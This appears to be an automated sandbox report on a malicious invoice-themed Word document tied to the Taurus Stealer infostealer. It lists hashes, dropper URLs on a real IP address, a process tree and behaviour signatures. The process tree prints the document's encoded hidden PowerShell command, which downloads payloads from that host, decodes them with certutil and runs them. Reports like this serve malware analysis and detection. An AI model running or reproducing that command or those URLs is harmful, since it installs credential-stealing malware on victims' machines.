Static

static

8

msoffice_i...27.doc

windows7_x64

10

msoffice_i...27.doc

windows10_x64

10

Analysis

  • max time kernel
    84s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    03-08-2020 17:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    msoffice_invoice1764727.doc

  • Size

    97KB

  • MD5

    5d38f68c18e3d9557523b25ad3fe4a86

  • SHA1

    a2c736b4bb06131dbb828c79711a1c7ec729d501

  • SHA256

    eef4b50a6a9a4371bc70b9b79d033053f0419c8c216118a6b5046117e4d6e272

  • SHA512

    4a6dcba8e2563f09dda60ac52dcda7f93e699f254a745d04ebbec57564e37371470e9d41473c2e33ad11256dea9f7a811810aeab1263a203048058c83a3f73f9

Score
10/10
taurus_stealerstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.189.12.182/RLCOrLHeK.com
exe.dropper

http://185.189.12.182/FfvEZtUVUkHjw.com
exe.dropper

http://185.189.12.182/GUavFcvTh.com

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

    trojanstealertaurus_stealer
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\msoffice_invoice1764727.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1452
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -e SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA4ADkALgAxADIALgAxADgAMgAvAFIATABDAE8AcgBMAEgAZQBLAC4AYwBvAG0ALABoAHQAdABwADoALwAvADEAOAA1AC4AMQA4ADkALgAxADIALgAxADgAMgAvAEYAZgB2AEUAWgB0AFUAVgBVAGsASABqAHcALgBjAG8AbQAsAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAxADgAOQAuADEAMgAuADEAOAAyAC8ARwBVAGEAdgBGAGMAdgBUAGgALgBjAG8AbQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAIgAkAGUAbgB2ADoAVABFAE0AUABcAHYAdABnAGkAdwAuAGMAbwBtACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdgAxAG0AZABrACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwARwBVAGEAdgBGAGMAdgBUAGgALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHYAMQBtAGQAawAgADUAMQAzAGsAaQA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdgB0AGcAaQB3ACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgADUAMQAzAGsAaQA=
    1⤵
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:316
    • C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decode v1mdk 513ki
      2⤵
        PID:1644
      • C:\Users\Admin\AppData\Local\Temp\vtgiw.com
        "C:\Users\Admin\AppData\Local\Temp\vtgiw.com" 513ki
        2⤵
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Users\Admin\AppData\Local\Temp\vtgiw.com
          C:\Users\Admin\AppData\Local\Temp\vtgiw.com 513ki
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Windows\SysWOW64\ipconfig.exe
            "C:\Windows\SysWOW64\ipconfig.exe"
            4⤵
            • Gathers network information
            • Suspicious use of WriteProcessMemory
            PID:1984
            • C:\Windows\SysWOW64\cmd.exe
              /c timeout /t 3 & del /f /q C:\Windows\SysWOW64\ipconfig.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:348
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 3
                6⤵
                • Delays execution with timeout.exe
                PID:1736

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\513ki
      MD5

      b736f95b5d8ae352c0a62e3464a8b7b8

      SHA1

      3241498fcf79fe660f8cf9910247a3b77fe4a259

      SHA256

      96504d682a344bc794f60f9dcc3b31d8af188ff8b3ddf897d9eb49bfb1536c5b

      SHA512

      524dc830788f73435b34129d5d1da0f8a9e39d24271200fa72b1dff1f7b154699bf43ca5d4f93882ff512fd427410b722a35e71fd8d2086b3aa6dea3ffd8e9ee

      Download Submit

    • memory/348-9-0x0000000000000000-mapping.dmp

      Download

    • memory/1644-2-0x0000000000000000-mapping.dmp

      Download

    • memory/1736-10-0x0000000000000000-mapping.dmp

      Download

    • memory/1932-3-0x0000000000000000-mapping.dmp

      Download

    • memory/1968-5-0x0000000000000000-mapping.dmp

      Download

    • memory/1984-6-0x0000000000400000-0x0000000000431000-memory.dmp

      Filesize

      196KB

      Download

    • memory/1984-7-0x0000000000417555-mapping.dmp

      Download

    • memory/1984-8-0x0000000000400000-0x0000000000431000-memory.dmp

      Filesize

      196KB

      Download